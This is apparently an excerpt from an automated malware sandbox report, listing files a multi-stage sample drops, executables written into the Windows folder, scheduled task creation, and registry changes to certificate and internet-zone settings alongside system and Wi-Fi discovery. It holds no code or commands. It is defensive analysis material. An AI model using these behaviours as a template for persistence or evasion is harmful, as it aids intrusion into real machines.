| File created | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdateOnDemand.exe | C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\goopdateres_en-GB.dll | C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ml.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_en.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_nl.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files\Google\Chrome\Temp\source2552_1885989921\chrome.7z | C:\Program Files (x86)\Google\Update\Install\{4CDF4152-5A6E-4976-A69E-F9F5F6F3D666}\CR_9552F.tmp\setup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ro.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateBroker.exe | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\0315775e-23c9-4a8e-b200-8aa9bc1f8d15.txt | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\goopdateres_es.dll | C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\goopdateres_hi.dll | C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\goopdateres_ml.dll | C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_hi.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ja.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File opened for modification | C:\Program Files\Crashpad\metadata | C:\Program Files (x86)\Google\Update\Install\{4CDF4152-5A6E-4976-A69E-F9F5F6F3D666}\CR_9552F.tmp\setup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\goopdateres_tr.dll | C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\goopdateres_zh-TW.dll | C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_bn.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_es.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_et.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_vi.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\Install\{4CDF4152-5A6E-4976-A69E-F9F5F6F3D666}\131.0.6778.140_chrome_installer.exe | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\psmachine.dll | C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\goopdateres_de.dll | C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler64.exe | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\goopdateres_hu.dll | C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_de.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\Install\{4CDF4152-5A6E-4976-A69E-F9F5F6F3D666}\CR_9552F.tmp\setup.exe | C:\Program Files (x86)\Google\Update\Install\{4CDF4152-5A6E-4976-A69E-F9F5F6F3D666}\131.0.6778.140_chrome_installer.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_fa.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_pt-PT.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\Download\{430FD4D0-B729-4F61-AA34-91526481799D}\132.0.6833.0\UpdaterSetup.exe | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\psuser_64.dll | C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_am.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_da.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\psuser.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\Install\{4CDF4152-5A6E-4976-A69E-F9F5F6F3D666}\guiF495.tmp | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\goopdateres_en.dll | C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\goopdateres_fil.dll | C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\goopdateres_hr.dll | C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\psmachine.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\goopdateres_ko.dll | C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\goopdateres_vi.dll | C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ar.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_fi.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_fr.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_sk.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdateBroker.exe | C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\goopdateres_el.dll | C:\Users\Admin\AppData\Local\Temp\Files\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateCore.exe | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_hu.dll | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\481117205.exe | N/A |
| File opened for modification | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\481117205.exe | N/A |
| File created | C:\Windows\tynbyc.exe | C:\Users\Admin\AppData\Local\Temp\Files\svcyr.exe | N/A |
| File opened for modification | C:\Windows\tynbyc.exe | C:\Users\Admin\AppData\Local\Temp\Files\svcyr.exe | N/A |
| File opened for modification | C:\Windows\PgJune | C:\Users\Admin\AppData\Local\Temp\Files\PkContent.exe | N/A |
| File opened for modification | C:\Windows\MonsterRaymond | C:\Users\Admin\AppData\Local\Temp\Files\PkContent.exe | N/A |
| File opened for modification | C:\Windows\FirewireBros | C:\Users\Admin\AppData\Local\Temp\Files\PkContent.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Local\Temp\Files\Cvimelugfq.exe | N/A |
| File opened for modification | C:\Windows\PortugalCharges | C:\Users\Admin\AppData\Local\Temp\Files\PkContent.exe | N/A |
| File opened for modification | C:\Windows\PorcelainExhaust | C:\Users\Admin\AppData\Local\Temp\Files\PkContent.exe | N/A |
| File opened for modification | C:\Windows\ReceptorsTeeth | C:\Users\Admin\AppData\Local\Temp\Files\PkContent.exe | N/A |
Launches sc.exe
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
Browser Information Discovery
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Permission Groups Discovery: Local Groups
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\Lumm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Server.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\basx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\soft.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\anne.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\svcyr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\NVIDIA.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\jmqid\ljid.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\utility-inst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Server.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\jmqid\ljid.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-VCIE0.tmp\jy.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\shttpsr_mg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Google\Temp\GUM7DAE.tmp\GoogleUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\yellow-rose.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\tynbyc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\WindowsUI.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Server.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\dismhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\Cvimelugfq.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\gZtXpepbYS\u6V4s1Fv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\jmqid\ljid.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Server.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\q1wnx5ir.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\jmqid\ljid.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\fontdrvhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\tynbyc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\t.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\Cvimelugfq.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\TT18.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\newbundle2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\C1J7SVw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\sysnldcvmr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\jmqid\ljid.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Server.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\heo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\jmqid\ljid.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Server.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\Server.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\ZZZ.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\481117205.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\chicken123.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\ven_protected.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\Files\noll.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\gZtXpepbYS\u6V4s1Fv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\tynbyc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\gZtXpepbYS\u6V4s1Fv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\tynbyc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\tynbyc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\tynbyc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\Files\noll.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\Files\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\Files\4XYFk9r.exe | N/A |
Collects information from the system
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
